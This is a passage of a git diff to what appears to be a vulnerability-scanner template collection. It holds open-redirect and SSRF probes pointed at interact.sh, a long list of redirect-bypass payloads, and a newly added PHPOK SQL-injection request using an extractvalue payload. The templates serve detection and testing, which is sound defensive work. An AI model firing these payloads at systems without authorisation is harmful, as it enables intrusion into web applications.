'?page=example.com&_url=example.com&callback=example.com&checkout_url=example.com&content=example.com&continue=example.com&continueTo=example.com&counturl=example.com&data=example.com&dest=example.com&dest_url=example.com&dir=example.com&document=example.com&domain=example.com&done=example.com&download=example.com&feed=example.com&file=example.com&host=example.com&html=example.com&http=example.com&https=example.com&image=example.com&image_src=example.com&image_url=example.com&imageurl=example.com&include=example.com&langTo=example.com&media=example.com&navigation=example.com&next=example.com&open=example.com&out=example.com&page=example.com&page_url=example.com&pageurl=example.com&path=example.com&picture=example.com&port=example.com&proxy=example.com&redir=example.com&redirect=example.com&redirectUri=example.com&redirectUrl=example.com&reference=example.com&referrer=example.com&req=example.com&request=example.com&retUrl=example.com&return=example.com&returnTo=example.com&return_path=example.com&return_to=example.com&rurl=example.com&show=example.com&site=example.com&source=example.com&src=example.com&target=example.com&to=example.com&uri=example.com&url=example.com&val=example.com&validate=example.com&view=example.com&window=example.com&redirect_to=example.com&ret=example.com&r2=example.com&img=example.com&u=example.com&r=example.com&URL=example.com&AuthState=example.com' + - '%0a/interact.sh/' + - '%0d/interact.sh/' + - '%00/interact.sh/' + - '%09/interact.sh/' + - '%5C%5Cinteract.sh/%252e%252e%252f' + - '%5Cinteract.sh' + - '%5cinteract.sh/%2f%2e%2e' + - '%5c{{RootURL}}interact.sh/%2f%2e%2e' + - '../interact.sh' + - '.interact.sh' + - '/%5cinteract.sh' + - '////\;@interact.sh' + - '////interact.sh' + - '///interact.sh' + - '///interact.sh/%2f%2e%2e' + - '///interact.sh@//' + - '///{{RootURL}}interact.sh/%2f%2e%2e' + - '//;@interact.sh' + - '//\/interact.sh/' + - '//\@interact.sh' + - '//\interact.sh' + - '//\tinteract.sh/' + - '//interact.sh/%2F..' + - '//interact.sh//' + - '//interact.sh@//' + - '//interact.sh\tinteract.sh/' + - '//https://interact.sh@//' + - '/<>//interact.sh' + - '/\/\/interact.sh/' + - '/\/interact.sh' + - '/\interact.sh' + - '/interact.sh' + - '/interact.sh/%2F..' + - '/interact.sh/' + - '/interact.sh/..;/css' + - '/https:interact.sh' + - '/{{RootURL}}interact.sh/' + - '/〱interact.sh' + - '/〵interact.sh' + - '/ゝinteract.sh' + - '/ーinteract.sh' + - '/ーinteract.sh' + - '<>//interact.sh' + - '@interact.sh' + - '@https://interact.sh' + - '\/\/interact.sh/' + - 'interact%E3%80%82sh' + - 'interact.sh' + - 'interact.sh/' + - 'interact.sh//' + - 'interact.sh;@' + - 'https%3a%2f%2finteract.sh%2f' + - 'https:%0a%0dinteract.sh' + - 'https://%0a%0dinteract.sh' + - 'https://%09/interact.sh' + - 'https://%2f%2f.interact.sh/' + - 'https://%3F.interact.sh/' + - 'https://%5c%5c.interact.sh/' + - 'https://%5cinteract.sh@' + - 'https://%23.interact.sh/' + - 'https://.interact.sh' + - 'https://////interact.sh' + - 'https:///interact.sh' + - 'https:///interact.sh/%2e%2e' + - 'https:///interact.sh/%2f%2e%2e' + - 'https:///interact.sh@interact.sh/%2e%2e' + - 'https:///interact.sh@interact.sh/%2f%2e%2e' + - 'https://:80#@interact.sh/' + - 'https://:80?@interact.sh/' + - 'https://:@\@interact.sh' + - 'https://:@interact.sh\@interact.sh' + - 'https://:@interact.sh\@WillBeReplaced.com' + - 'https://;@interact.sh' + - 'https://\tinteract.sh/' + - 'https://interact.sh/interact.sh' + - 'https://interact.sh/https://interact.sh/' + - 'https://www.\.interact.sh' + - 'https:/\/\interact.sh' + - 'https:/\interact.sh' + - 'https:/interact.sh' + - 'https:interact.sh' + - '{{RootURL}}interact.sh' + - '〱interact.sh' + - '〵interact.sh' + - 'ゝinteract.sh' + - 'ーinteract.sh' + - 'ーinteract.sh' + - '?page=interact.sh&_url=interact.sh&callback=interact.sh&checkout_url=interact.sh&content=interact.sh&continue=interact.sh&continueTo=interact.sh&counturl=interact.sh&data=interact.sh&dest=interact.sh&dest_url=interact.sh&dir=interact.sh&document=interact.sh&domain=interact.sh&done=interact.sh&download=interact.sh&feed=interact.sh&file=interact.sh&host=interact.sh&html=interact.sh&http=interact.sh&https=interact.sh&image=interact.sh&image_src=interact.sh&image_url=interact.sh&imageurl=interact.sh&include=interact.sh&langTo=interact.sh&media=interact.sh&navigation=interact.sh&next=interact.sh&open=interact.sh&out=interact.sh&page=interact.sh&page_url=interact.sh&pageurl=interact.sh&path=interact.sh&picture=interact.sh&port=interact.sh&proxy=interact.sh&redir=interact.sh&redirect=interact.sh&redirectUri=interact.sh&redirectUrl=interact.sh&reference=interact.sh&referrer=interact.sh&req=interact.sh&request=interact.sh&retUrl=interact.sh&return=interact.sh&returnTo=interact.sh&return_path=interact.sh&return_to=interact.sh&rurl=interact.sh&show=interact.sh&site=interact.sh&source=interact.sh&src=interact.sh&target=interact.sh&to=interact.sh&uri=interact.sh&url=interact.sh&val=interact.sh&validate=interact.sh&view=interact.sh&window=interact.sh&redirect_to=interact.sh&ret=interact.sh&r2=interact.sh&img=interact.sh&u=interact.sh&r=interact.sh&URL=interact.sh&AuthState=interact.sh' stop-at-first-match: true matchers-condition: and @@ -111,7 +111,7 @@ requests: - type: regex part: header regex: - - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)example\.com\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1 + - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1 - type: status status: diff --git a/vulnerabilities/httpbin/httpbin-open-redirect.yaml b/vulnerabilities/httpbin/httpbin-open-redirect.yaml index 08aff96109..961d4ae06f 100644 --- a/vulnerabilities/httpbin/httpbin-open-redirect.yaml +++ b/vulnerabilities/httpbin/httpbin-open-redirect.yaml @@ -15,13 +15,13 @@ info: requests: - method: GET path: - - "{{BaseURL}}/redirect-to?url=https%3A%2F%2Fexample.com" + - "{{BaseURL}}/redirect-to?url=https%3A%2F%2Finteract.sh" matchers-condition: and matchers: - type: dsl dsl: - - 'location == "https://example.com"' + - 'location == "https://interact.sh"' - type: status status: diff --git a/vulnerabilities/ibm/ibm-websphere-ssrf.yaml b/vulnerabilities/ibm/ibm-websphere-ssrf.yaml deleted file mode 100644 index 777b9a5e06..0000000000 --- a/vulnerabilities/ibm/ibm-websphere-ssrf.yaml +++ /dev/null @@ -1,29 +0,0 @@ -id: ibm-websphere-ssrf - -info: - name: IBM WebSphere Portal SSRF - author: pdteam - severity: high - reference: - - https://blog.assetnote.io/2021/12/26/chained-ssrf-websphere/ - tags: ibm,ssrf,websphere - -requests: - - method: GET - path: - - '{{BaseURL}}/docpicker/internal_proxy/http/example.com' - - '{{BaseURL}}/wps/PA_WCM_Authoring_UI/proxy/http/example.com' - - redirects: true - max-redirects: 2 - stop-at-first-match: true - matchers-condition: and - matchers: - - - type: status - status: - - 200 - - - type: word - words: - - "Example Domain" \ No newline at end of file diff --git a/vulnerabilities/linkerd/linkerd-ssrf.yaml b/vulnerabilities/linkerd/linkerd-ssrf.yaml index ec72073405..23f52c1e15 100644 --- a/vulnerabilities/linkerd/linkerd-ssrf.yaml +++ b/vulnerabilities/linkerd/linkerd-ssrf.yaml @@ -13,7 +13,7 @@ requests: path: - "{{BaseURL}}" headers: - l5d-dtab: /svc/* => /$/inet/example.com/443 + l5d-dtab: /svc/* => /$/inet/interact.sh/443 matchers-condition: or matchers: diff --git a/vulnerabilities/netsweeper/netsweeper-open-redirect.yaml b/vulnerabilities/netsweeper/netsweeper-open-redirect.yaml index 290e17322f..b1dbdbf43a 100644 --- a/vulnerabilities/netsweeper/netsweeper-open-redirect.yaml +++ b/vulnerabilities/netsweeper/netsweeper-open-redirect.yaml @@ -12,10 +12,10 @@ info: requests: - method: GET path: - - "{{BaseURL}}/webadmin/authportal/bounce.php?url=https://example.com/" + - "{{BaseURL}}/webadmin/authportal/bounce.php?url=https://interact.sh/" matchers: - type: regex part: header regex: - - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)(?:[a-zA-Z0-9\-_\.@]*)example\.com.*$' + - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh.*$' diff --git a/cves/2020/CVE-2020-22210.yaml b/vulnerabilities/other/74cms-sqli.yaml similarity index 68% rename from cves/2020/CVE-2020-22210.yaml rename to vulnerabilities/other/74cms-sqli.yaml index bfaf3b2e88..4b0a186279 100644 --- a/cves/2020/CVE-2020-22210.yaml +++ b/vulnerabilities/other/74cms-sqli.yaml @@ -1,19 +1,18 @@ -id: CVE-2020-22210 +id: 74cms-sqli info: name: 74cms Sql Injection author: princechaddha severity: critical - description: A SQL injection vulnerability exists in 74cms 3.2.0 via the x parameter to ajax_officebuilding.php. + description: A SQL injection vulnerability exists in 74cms 5.0.1 AjaxPersonalController.class.php. reference: - - https://nvd.nist.gov/vuln/detail/CVE-2020-22210 - - https://github.com/blindkey/cve_like/issues/11 + - https://github.com/possib1e/vuln/issues/3 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2020-22210 cwe-id: CWE-89 - tags: cve,cve2020,74cms,sqli + tags: 74cms,sqli requests: - method: GET @@ -27,3 +26,4 @@ requests: part: body # Enhanced by mp on 2022/03/02 +# Enhanced by ritikchaddha on 2022/05/05 diff --git a/vulnerabilities/other/aspnuke-openredirect.yaml b/vulnerabilities/other/aspnuke-openredirect.yaml index e6ce2c4e2f..1dcc28d81d 100644 --- a/vulnerabilities/other/aspnuke-openredirect.yaml +++ b/vulnerabilities/other/aspnuke-openredirect.yaml @@ -9,10 +9,10 @@ info: requests: - method: GET path: - - "{{BaseURL}}/gotoURL.asp?url=example.com&id=43569" + - "{{BaseURL}}/gotoURL.asp?url=interact.sh&id=43569" matchers: - type: regex part: header regex: - - '(?m)^(?:Location\s*:\s*)(?:https?://|//)?(?:[a-zA-Z0-9\-_]*\.)?example\.com(?:\s*)$' \ No newline at end of file + - '(?m)^(?:Location\s*:\s*)(?:https?://|//)?(?:[a-zA-Z0-9\-_]*\.)?interact\.sh(?:\s*)$' \ No newline at end of file diff --git a/vulnerabilities/other/bitrix-open-redirect.yaml b/vulnerabilities/other/bitrix-open-redirect.yaml index 676932a520..3ddf1a643c 100644 --- a/vulnerabilities/other/bitrix-open-redirect.yaml +++ b/vulnerabilities/other/bitrix-open-redirect.yaml @@ -12,25 +12,25 @@ info: requests: - method: GET path: - - '{{BaseURL}}/bitrix/rk.php?goto=https://example.com' - - '{{BaseURL}}/bitrix/redirect.php?event1=&event2=&event3=&goto=https://example.com' - - '{{BaseURL}}/bitrix/redirect.php?event3=352513&goto=https://example.com' - - '{{BaseURL}}/bitrix/redirect.php?event1=demo_out&event2=sm_demo&event3=pdemo&goto=https://example.com' - - '{{BaseURL}}/bitrix/redirect.php?site_id=s1&event1=select_product_t1&event2=contributions&goto=https://example.com' - - '{{BaseURL}}/bitrix/redirect.php?event1=&event2=&event3=download&goto=https://example.com' - - '{{BaseURL}}/bitrix/rk.php?id=28&site_id=s2&event1=banner&event2=click&event3=3+%2F+%5B28%5D+%5BBANNER_AREA_FOOTER2%5D+%D0%9F%D0%BE%D1%81%D0%B5%D1%82%D0%B8%D1%82%D0%B5+%D0%B2%D0%B2%D0%BE%D0%B4%D0%BD%D1%83%D1%8E+%D0%B1%D0%B5%D1%81%D0%BF%D0%BB%D0%B0%D1%82%D0%BD%D1%83%D1%8E+%D0%BB%D0%B5%D0%BA%D1%86%D0%B8%D1%8E+APTOS&goto=https://example.com' - - '{{BaseURL}}/bitrix/rk.php?id=84&site_id=n1&event1=banner&event2=click&event3=1+%2F+%5B84%5D+%5BMOBILE_HOME%5D+Love+Card&goto=https://example.com' - - '{{BaseURL}}/bitrix/rk.php?id=691&site_id=s3&event1=banner&event2=click&event3=1+%2F+%5B691%5D+%5BNEW_INDEX_BANNERS%5D+Trade-in+football&goto=https://example.com' - - '{{BaseURL}}/bitrix/rk.php?id=129&event1=banner&event2=click&event3=5+%2F+%5B129%5D+%5BGARMIN_AKCII%5D+Garmin+%E1%EE%ED%F3%F1+%ED%EE%E2%EE%F1%F2%FC+%E2+%E0%EA%F6%E8%E8&goto=https://example.com' - - '{{BaseURL}}/bitrix/redirect.php?event1=%D0%A1%D0%BF%D0%B5%D1%86%D0%B8%D0%B0%D0%BB%D1%8C%D0%BD%D1%8B%D0%B5+%D0%B4%D0%BE%D0%BA%D0%BB%D0%B0%D0%B4%D1%8B&event2=&event3=download&goto=https://example.com' - - '{{BaseURL}}/bitrix/redirect.php?event1=%D0%A1%D0%BF%D0%B5%D1%86%D0%B8%D0%B0%D0%BB%D1%8C%D0%BD%D1%8B%D0%B5+%D0%B4%D0%BE%D0%BA%D0%BB%D0%B0%D0%B4%D1%8B&event2=&event3=download&goto=https://example.com' + - '{{BaseURL}}/bitrix/rk.php?goto=https://interact.sh' + - '{{BaseURL}}/bitrix/redirect.php?event1=&event2=&event3=&goto=https://interact.sh' + - '{{BaseURL}}/bitrix/redirect.php?event3=352513&goto=https://interact.sh' + - '{{BaseURL}}/bitrix/redirect.php?event1=demo_out&event2=sm_demo&event3=pdemo&goto=https://interact.sh' + - '{{BaseURL}}/bitrix/redirect.php?site_id=s1&event1=select_product_t1&event2=contributions&goto=https://interact.sh' + - '{{BaseURL}}/bitrix/redirect.php?event1=&event2=&event3=download&goto=https://interact.sh' + - '{{BaseURL}}/bitrix/rk.php?id=28&site_id=s2&event1=banner&event2=click&event3=3+%2F+%5B28%5D+%5BBANNER_AREA_FOOTER2%5D+%D0%9F%D0%BE%D1%81%D0%B5%D1%82%D0%B8%D1%82%D0%B5+%D0%B2%D0%B2%D0%BE%D0%B4%D0%BD%D1%83%D1%8E+%D0%B1%D0%B5%D1%81%D0%BF%D0%BB%D0%B0%D1%82%D0%BD%D1%83%D1%8E+%D0%BB%D0%B5%D0%BA%D1%86%D0%B8%D1%8E+APTOS&goto=https://interact.sh' + - '{{BaseURL}}/bitrix/rk.php?id=84&site_id=n1&event1=banner&event2=click&event3=1+%2F+%5B84%5D+%5BMOBILE_HOME%5D+Love+Card&goto=https://interact.sh' + - '{{BaseURL}}/bitrix/rk.php?id=691&site_id=s3&event1=banner&event2=click&event3=1+%2F+%5B691%5D+%5BNEW_INDEX_BANNERS%5D+Trade-in+football&goto=https://interact.sh' + - '{{BaseURL}}/bitrix/rk.php?id=129&event1=banner&event2=click&event3=5+%2F+%5B129%5D+%5BGARMIN_AKCII%5D+Garmin+%E1%EE%ED%F3%F1+%ED%EE%E2%EE%F1%F2%FC+%E2+%E0%EA%F6%E8%E8&goto=https://interact.sh' + - '{{BaseURL}}/bitrix/redirect.php?event1=%D0%A1%D0%BF%D0%B5%D1%86%D0%B8%D0%B0%D0%BB%D1%8C%D0%BD%D1%8B%D0%B5+%D0%B4%D0%BE%D0%BA%D0%BB%D0%B0%D0%B4%D1%8B&event2=&event3=download&goto=https://interact.sh' + - '{{BaseURL}}/bitrix/redirect.php?event1=%D0%A1%D0%BF%D0%B5%D1%86%D0%B8%D0%B0%D0%BB%D1%8C%D0%BD%D1%8B%D0%B5+%D0%B4%D0%BE%D0%BA%D0%BB%D0%B0%D0%B4%D1%8B&event2=&event3=download&goto=https://interact.sh' stop-at-first-match: true matchers-condition: and matchers: - type: regex regex: - - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)example\.com.*$' + - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh.*$' part: header - type: status diff --git a/vulnerabilities/other/dedecms-openredirect.yaml b/vulnerabilities/other/dedecms-openredirect.yaml index 689d98efa2..f240d95c4d 100644 --- a/vulnerabilities/other/dedecms-openredirect.yaml +++ b/vulnerabilities/other/dedecms-openredirect.yaml @@ -14,13 +14,13 @@ info: requests: - method: GET path: - - "{{BaseURL}}/plus/download.php?open=1&link=aHR0cHM6Ly9ldmlsLmNvbQo=" + - "{{BaseURL}}/plus/download.php?open=1&link=aHR0cHM6Ly9pbnRlcmFjdC5zaA==" matchers-condition: and matchers: - type: word words: - - "Location: https://evil.com" + - "Location: https://interact.sh" part: header - type: status diff --git a/vulnerabilities/other/homeautomation-v3-openredirect.yaml b/vulnerabilities/other/homeautomation-v3-openredirect.yaml index 539e6eb49d..f73aa868e7 100644 --- a/vulnerabilities/other/homeautomation-v3-openredirect.yaml +++ b/vulnerabilities/other/homeautomation-v3-openredirect.yaml @@ -12,10 +12,10 @@ info: requests: - method: GET path: - - "{{BaseURL}}/homeautomation_v3_3_2/api.php?do=groups/toggle&groupid=1&status=1&redirect=https://example.com/" + - "{{BaseURL}}/homeautomation_v3_3_2/api.php?do=groups/toggle&groupid=1&status=1&redirect=https://interact.sh/" matchers: - type: regex regex: - - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)example\.com.*$' + - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh.*$' part: header diff --git a/vulnerabilities/other/odoo-cms-redirect.yaml b/vulnerabilities/other/odoo-cms-redirect.yaml index 3fecc9364a..431683a7c5 100644 --- a/vulnerabilities/other/odoo-cms-redirect.yaml +++ b/vulnerabilities/other/odoo-cms-redirect.yaml @@ -13,10 +13,10 @@ info: requests: - method: GET path: - - "{{BaseURL}}/website/lang/en_US?r=https://example.com/" + - "{{BaseURL}}/website/lang/en_US?r=https://interact.sh/" matchers: - type: regex regex: - - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)example\.com.*$' + - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh.*$' part: header diff --git a/vulnerabilities/other/otobo-open-redirect.yaml b/vulnerabilities/other/otobo-open-redirect.yaml index f18da7474c..07698281aa 100644 --- a/vulnerabilities/other/otobo-open-redirect.yaml +++ b/vulnerabilities/other/otobo-open-redirect.yaml @@ -13,10 +13,10 @@ info: requests: - method: GET path: - - '{{BaseURL}}/otobo/index.pl?Action=ExternalURLJump;URL=http://www.example.com' + - '{{BaseURL}}/otobo/index.pl?Action=ExternalURLJump;URL=http://www.interact.sh' matchers: - type: regex part: header regex: - - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)example\.com\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1 + - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1 diff --git a/vulnerabilities/other/phpok-sqli.yaml b/vulnerabilities/other/phpok-sqli.yaml new file mode 100644 index 0000000000..5726efd6d8 --- /dev/null +++ b/vulnerabilities/other/phpok-sqli.yaml @@ -0,0 +1,21 @@ +id: phpok-sqli + +info: + name: PHPOK - Sql Injection + author: ritikchaddha + severity: high + metadata: + fofa-query: app="phpok" + tags: phpok,sqli + +requests: + - method: GET + path: + - "{{BaseURL}}/api.php?c=project&f=index&token=1234&id=news&sort=1 and extractvalue(1,concat(0x7e,md5({{randstr}}))) --+" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - '{{md5("{{randstr}}")}}' diff --git a/vulnerabilities/other/pollbot-redirect.yaml b/vulnerabilities/other/pollbot-redirect.yaml index c11e6df5d3..251cdd6ee3 100644 --- a/vulnerabilities/other/pollbot-redirect.yaml +++ b/vulnerabilities/other/pollbot-redirect.yaml @@ -13,14 +13,14 @@ info: requests: - method: GET path: - - '{{BaseURL}}/%0A/example.com/' + - '{{BaseURL}}/%0A/interact.sh/' matchers-condition: and matchers: - type: regex part: header regex: - - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)example\.com\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1 + - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1 - type: status status: diff --git a/vulnerabilities/other/sap-redirect.yaml b/vulnerabilities/other/sap-redirect.yaml index 906e0b928c..fdb3dab9d7 100644 --- a/vulnerabilities/other/sap-redirect.yaml +++ b/vulnerabilities/other/sap-redirect.yaml @@ -11,7 +11,7 @@ requests: - method: GET path: - - "{{BaseURL}}/sap/public/bc/icf/logoff?redirecturl=https://example.com" + - "{{BaseURL}}/sap/public/bc/icf/logoff?redirecturl=https://interact.sh" matchers-condition: and matchers: @@ -22,7 +22,7 @@ requests: - type: word words: - - "Location: https://www.example.com" - - "Location: https://example.com" + - "Location: https://www.interact.sh" + - "Location: https://interact.sh" condition: or part: header diff --git a/vulnerabilities/other/thinkific-redirect.yaml b/vulnerabilities/other/thinkific-redirect.yaml index 90dc713ceb..a5baf35e95 100644 --- a/vulnerabilities/other/thinkific-redirect.yaml +++ b/vulnerabilities/other/thinkific-redirect.yaml @@ -10,7 +10,7 @@ requests: - method: GET path: - - "{{BaseURL}}/api/sso/v2/sso/jwt?error_url=http://evil.com" + - "{{BaseURL}}/api/sso/v2/sso/jwt?error_url=http://interact.sh" matchers-condition: and matchers: @@ -19,6 +19,6 @@ requests: - 302 - type: word words: - - "